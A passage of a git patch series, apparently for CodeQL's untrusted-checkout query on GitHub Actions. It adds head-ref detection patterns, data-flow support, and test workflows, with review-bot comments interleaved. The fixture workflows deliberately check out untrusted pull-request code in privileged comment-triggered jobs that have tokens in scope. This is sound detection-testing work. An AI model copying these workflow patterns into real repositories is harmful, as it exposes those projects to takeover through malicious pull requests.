@@ -47,22 +49,18 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. - "\\benv\\.GITHUB_HEAD_REF\\b", - - "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", 
@@ -79,7 +77,14 @@ abstract class PRHeadCheckoutStep extends Step { }
 class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
 ActionsCheckout() {
 this.getCallee() = "actions/checkout" and
- containsHeadRef(this.getArgumentExpr("ref").getExpression())
+ (
+ containsHeadRef(this.getArgumentExpr("ref").getExpression())
+ or
+ exists(UsesStep head |
+ head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
+ )
+ )
 }
 }
@@ -103,7 +108,10 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run {
 from Workflow w, PRHeadCheckoutStep checkout
 where
- w.hasTriggerEvent(["pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and
+ w.hasTriggerEvent([
+ "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review",
+ "workflow_run", "check_run", "check_suite", "workflow_call"
+ ]) and
 w.getAJob().(LocalJob).getAStep() = checkout and
 not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
new file mode 100644
index 000000000000..4de47d6f17a0
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
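Review bot: In the first hunk the two action names that resolve a PR head are inlined in the ActionsCheckout constructor; extracting them into a named predicate such as `predicate isPRHeadResolver(UsesStep s) { s.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] }` would let GitCheckout reuse the same list and give the allowlist a place for a comment naming which outputs (`head_sha`/`head_ref`) carry the untrusted ref. As written, `DataFlow::hasLocalFlowExpr(head, ...)` presumably matches any output of those steps flowing into `ref`, not just the head ref, and nothing visible constrains `head` to the same job as `this`; if hasLocalFlowExpr does not already enforce that, it should be checked. The second hunk is formatting only. The `where` clause continues outside the second hunk.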
@@ -0,0 +1,53 @@
+name: PR head from 3rd party action
+
+on:
+ workflow_call:
+ workflow_dispatch:
+
+jobs:
+
+ test1:
+ runs-on: ubuntu-20.04
+ steps:
+ - name: (PR comment) Get PR branch
+ if: ${{ github.event_name == 'issue_comment' }}
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+
+ - name: (PR comment) Checkout PR branch
+ if: ${{ github.event_name == 'issue_comment' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_sha }}
+
+ test2:
+ runs-on: ubuntu-20.04
+ steps:
+ - name: (PR comment) Get PR branch
+ if: ${{ github.event_name == 'issue_comment' }}
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+
+ - name: (PR comment) Checkout PR branch
+ if: ${{ github.event_name == 'issue_comment' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+
+ test3:
+ runs-on: ubuntu-20.04
+ steps:
+ - name: resolve pr refs
+ id: refs
+ uses: eficode/resolve-pr-refs@main
+ with:
+ token: ${{ secrets.GITHUB_TOKEN }}
+
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ steps.refs.outputs.head_ref }}
+ fetch-depth: 0
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ steps.refs.outputs.head_sha }}
+ fetch-depth: 0
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml
new file mode 100644
index 000000000000..ece4c02c3565
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml
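Review bot: The steps in test1 and test2 are guarded by `if: ${{ github.event_name == 'issue_comment' }}`, but `on:` lists only `workflow_call` and `workflow_dispatch`, so that branch can never run and the expected alerts come from the `workflow_call` trigger alone. If the fixture is meant to model the comment-triggered pattern its step names describe, add `issue_comment:` under `on:`; otherwise the guards are misleading and should be dropped. A one-line header comment stating which trigger the test relies on, e.g. `# privileged via workflow_call; the issue_comment guards are decorative`, would also help the next person reading the expected file.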
@@ -0,0 +1,46 @@
+name: Direct access
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ if: github.event_name == 'issue_comment' && github.event.issue.pull_request
+ steps:
+ - name: Unsafe Code Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch
+ test2:
+ runs-on: ubuntu-latest
+ if: github.event.issue.pull_request && github.event.comment.body == '/trigger release'
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: refs/pull/${{ github.event.issue.number }}/merge
+
+ test3:
+ runs-on: ubuntu-latest
+ if: github.event.issue.pull_request && github.event.comment.body == '/trigger release'
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }}
+
+ test4:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout Branch
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }}
+
+ test5:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout Branch
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml
new file mode 100644
index 000000000000..8c0865f598cd
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml
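Review bot: Every job in this fixture, and in the sibling files added by this commit, is a positive case, so UntrustedCheckout.expected only proves the query fires and never that it stays quiet; one job on the same `issue_comment` trigger with `ref: ${{ github.sha }}` (or no `ref:` at all) would pin the false-positive side of the new heuristics. test4 references `pull_request_review_comment` although `on:` only has `issue_comment`; that is harmless for a regexp-based check, but a comment such as `# event name is never evaluated; only the ref expression text is analysed` would stop a reader from taking it as a runtime scenario.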
@@ -0,0 +1,50 @@
+name: Heuristic based
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Get Info from comment
+ uses: actions/github-script@v7
+ id: get-pr-info
+ with:
+ script: |
+ const request = {
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: ${{ github.event.issue.number }},
+ }
+ core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`)
+ const pr = await github.rest.pulls.get(request);
+ return pr.data;
+ - name: Debug
+ id: get-sha
+ run: |
+ echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT
+ - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )"
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ steps.get-sha.outputs.sha }}
+
+ test2:
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Detect branch for PR
+ id: vars
+ run: |
+ PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 )
+ PR_INFO=$( curl \
+ --request GET \
+ --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \
+ --header 'content-type: application/json' \
+ --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR )
+ REF=$(echo "${PR_INFO}" | jq -r .head.ref)
+ echo "branch=$REF" >> $GITHUB_OUTPUT
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ steps.vars.outputs.branch }}
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml
new file mode 100644
index 000000000000..1245d0302fb4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml
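Review bot: The `run:` blocks in both jobs interpolate `${{ ... }}` expressions straight into shell text (`echo "sha=${{ fromJSON(...).head.sha }}"`, `echo "${{ github.event.comment.issue_url }}"`, the bearer token in a `--header` argument); that is what the query under test needs, but any expression-injection or secret-exposure query run over this test directory may also report these steps, so the fixture's purpose should be stated in a header comment such as `# fixture for UntrustedCheckout only; the inline expressions are intentional`. The `$GITHUB_OUTPUT` redirections are unquoted, which is fine for a fixture but not something to copy into real workflows.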
@@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return 
pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 67fcc5555d16..48b7b762605c 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -3,6 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit 
(heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index be1c7cbfebdb..c7f4e4ad1c20 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -1,4 +1,13 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | 
From 22d0600da8d8a58fba75ca358b7e439111af5441 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 13:28:39 +0100
Subject: [PATCH 107/707] Support more PR head checkouts

---
 ql/lib/codeql/actions/Ast.qll | 4 +++-
 ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 9 +++++++++
 .../Security/CWE-829/UntrustedCheckout.expected | 8 ++++++++
 4 files changed, 22 insertions(+), 1 deletion(-)

diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 70424a46f95b..4a7ff12b4f96 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -232,7 +232,9 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere
 AstNode getTarget() { result = super.getTarget() }
 }
-class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { }
+class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl {
+ string getStepId() { result = super.getStepId() }
+}
 class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 084474b40204..5c6ce37fa928 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -858,6 +858,8 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl {
 this.getEnclosingJob() = result.getEnclosingJob() and
 result.(StepImpl).getId() = stepId
 }
+
+ string getStepId() { result = stepId }
 }
 /**
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
index a24c80a2f607..f12f11020875 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
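Review bot: The new public `getStepId()` on StepsExpression in the first hunk has no QLDoc, and the second hunk adds the internal `StepsExpressionImpl.getStepId()` undocumented as well; a one-liner on the public member such as `/** Gets the id of the step this steps expression refers to. */` is enough, and the surrounding exported class presumably follows that convention for its other members. StepsExpressionImpl's body starts before its hunk, so where `stepId` is bound is not visible here.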
@@ -66,6 +66,7 @@ predicate containsHeadRef(string s) {
 "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
 "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b",
 "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b",
+ "\\bhead\\.sha\\b", "\\bhead\\.ref\\b"
 ], _, _)
 )
 }
@@ -80,6 +81,14 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
 (
 containsHeadRef(this.getArgumentExpr("ref").getExpression())
 or
+ exists(StepsExpression e |
+ this.getArgumentExpr("ref") = e and
+ (
+ e.getStepId().matches(["%sha%", "%head%", "branch"]) or
+ e.getFieldName().matches(["%sha%", "%head%", "branch"])
+ )
+ )
+ or
 exists(UsesStep head |
 head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
 DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
index c7f4e4ad1c20..a6f02e7752a2 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
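Review bot: In the second hunk the pattern list `["%sha%", "%head%", "branch"]` mixes wildcard and exact matches: `%sha%` and `%head%` match anywhere in the step id or field name, whereas `branch` matches only the whole string, so a step id like `comment-branch` or a field like `pr_branch` is not caught by this heuristic. If the exact match is intentional, a comment should say why; otherwise `"%branch%"` keeps the three patterns consistent. In the first hunk, the new catch-all `\bhead\.sha\b` / `\bhead\.ref\b` entries subsume most of the explicit `...head.sha` / `...head.ref` entries above them and deliberately extend to step outputs such as `fromJson(steps.x.outputs.data).head.ref`; a comment such as `// catch-all for any <context>.head.sha / .head.ref, including parsed step outputs` would make that widening explicit rather than leaving it to be inferred from the test files. containsHeadRef and ActionsCheckout both start before their hunks.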
@@ -10,4 +10,12 @@ | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 778d8978b05267a6b1eed1df7d5e03cb8ea9f8a7 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 13:55:10 +0100
Subject: [PATCH 108/707] DF support for untrusted checkout query

---
 .../dataflow/internal/DataFlowPublic.qll | 1 +
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 18 ++++++++-----
 .../issue_comment_3rd_party_action.yml | 1 -
 .../.github/workflows/untrusted_checkout.yml | 26 ++++++-------------
 .../CWE-829/UnpinnedActionsTag.expected | 8 +++---
 .../CWE-829/UntrustedCheckout.expected | 11 ++++----
 6 files changed, 30 insertions(+), 35 deletions(-)

diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
index 8e8ed5d92802..681d6f1cfc39 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
@@ -176,6 +176,7 @@ class FieldContent extends Content, TFieldContent {
 }
 predicate hasLocalFlow(Node n1, Node n2) {
+ n1 = n2 or
 simpleLocalFlowStep(n1, n2) or
 exists(ContentSet c | ctxFieldReadStep(n1, n2, c))
 }
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
index f12f11020875..1be8a6ea0f5d 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
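Review bot: `hasLocalFlow` becomes reflexive here (`n1 = n2 or`) while still covering only a single `simpleLocalFlowStep` or `ctxFieldReadStep`, so a caller that reads the name as "local flow" will silently miss any path of two or more steps (for instance a step output copied into an env variable and then into an argument), and the predicate carries no QLDoc saying which it is. Either document it, e.g. `/** Holds if n2 is n1 itself or is reached from n1 by exactly one local flow step; this is not the transitive closure. */`, or, if callers expect full local flow, build it on something like `simpleLocalFlowStep*(n1, n2)`. The preceding FieldContent class starts before this hunk.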
@@ -79,8 +79,19 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
 ActionsCheckout() {
 this.getCallee() = "actions/checkout" and
 (
- containsHeadRef(this.getArgumentExpr("ref").getExpression())
+ // ref argument contains the head ref
+ exists(Expression e |
+ containsHeadRef(e.getExpression()) and
+ DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
+ )
+ or
+ // 3rd party actions returning the PR head sha/ref
+ exists(UsesStep head |
+ head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
+ )
 or
+ // heuristic base on the step id and field name
 exists(StepsExpression e |
 this.getArgumentExpr("ref") = e and
 (
@@ -88,11 +99,6 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
 e.getFieldName().matches(["%sha%", "%head%", "branch"])
 )
 )
- or
- exists(UsesStep head |
- head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
- DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
- )
 )
 }
 }
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
index 4de47d6f17a0..221854ec2042 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
@@ -13,7 +13,6 @@ jobs:
 if: ${{ github.event_name == 'issue_comment' }}
 uses: xt0rted/pull-request-comment-branch@v2
 id: comment-branch
-
 - name: (PR comment) Checkout PR branch
 if: ${{ github.event_name == 'issue_comment' }}
 uses: actions/checkout@v3
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml
index a37ceb8f9f65..6bcdcbb4291c 100644
